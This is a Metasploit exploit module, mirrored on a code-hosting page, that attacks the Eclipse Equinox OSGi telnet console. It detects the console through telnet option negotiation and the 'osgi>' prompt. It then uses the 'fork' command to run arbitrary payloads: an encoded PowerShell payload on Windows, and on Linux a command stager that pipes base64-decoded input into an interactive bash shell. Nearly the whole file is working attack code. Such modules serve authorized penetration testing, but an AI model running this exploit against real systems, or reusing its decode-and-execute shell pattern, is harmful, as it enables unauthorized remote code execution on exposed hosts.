Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/osgi_console_exec.rb
19591 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
require 'base64'
6
7
class MetasploitModule < Msf::Exploit::Remote
8
Rank = NormalRanking
9
10
include Msf::Exploit::Remote::Tcp
11
include Msf::Exploit::CmdStager
12
include Msf::Exploit::Powershell
13
14
TELNET_IAC = Msf::Exploit::Remote::Telnet
15
16
def initialize(info = {})
17
super(
18
update_info(
19
info,
20
'Name' => 'Eclipse Equinox OSGi Console Command Execution',
21
'Description' => %q{
22
Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console
23
'fork' command to execute arbitrary commands on the remote system.
24
},
25
'Author' => [
26
'Quentin Kaiser <[email protected]>'
27
],
28
'License' => MSF_LICENSE,
29
'References' => [
30
['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
31
],
32
'Platform' => %w{linux win},
33
'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
34
'Targets' => [
35
[ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
36
[ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
37
],
38
'CmdStagerFlavor' => [ 'bourne' ],
39
'DisclosureDate' => '2018-02-13',
40
'DefaultTarget' => 0,
41
'Notes' => {
42
'Reliability' => UNKNOWN_RELIABILITY,
43
'Stability' => UNKNOWN_STABILITY,
44
'SideEffects' => UNKNOWN_SIDE_EFFECTS
45
}
46
)
47
)
48
deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
49
register_options([
50
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
51
])
52
end
53
54
def check
55
connect
56
res = sock.get_once
57
if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \
58
TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \
59
TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \
60
TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
61
# terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
62
sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \
63
"\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)
64
res = sock.get_once
65
end
66
disconnect
67
if res && res == "osgi> "
68
return Exploit::CheckCode::Vulnerable
69
end
70
71
Exploit::CheckCode::Safe
72
end
73
74
def exploit
75
begin
76
print_status("Accessing the OSGi console ...")
77
78
unless check == Exploit::CheckCode::Vulnerable
79
fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
80
end
81
82
if target['Platform'] == "win" then
83
exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, { encode_final_payload: true, remove_comspec: true })}\"")
84
else
85
execute_cmdstager({ :flavor => :bourne })
86
end
87
88
print_status("#{rhost}:#{rport} - Waiting for session...")
89
90
(datastore['TIME_WAIT']).times do
91
Rex.sleep(1)
92
# Success! session is here!
93
break if session_created?
94
end
95
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
96
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
97
ensure
98
disconnect
99
end
100
end
101
102
def exec_command(cmd)
103
connect
104
res = sock.get_once
105
if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \
106
TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \
107
TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \
108
TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
109
sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \
110
"\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)
111
res = sock.get_once
112
end
113
print_status("Exploiting...")
114
sock.put("#{cmd}\r\n")
115
res = sock.get
116
sock.put("disconnect\r\n")
117
res = sock.get
118
sock.put("y\r\n")
119
end
120
121
def execute_command(cmd, opts = {})
122
cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
123
# Runtime.getRuntime().exec() workaround on Linux. Requires bash.
124
exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
125
end
126
end
127
128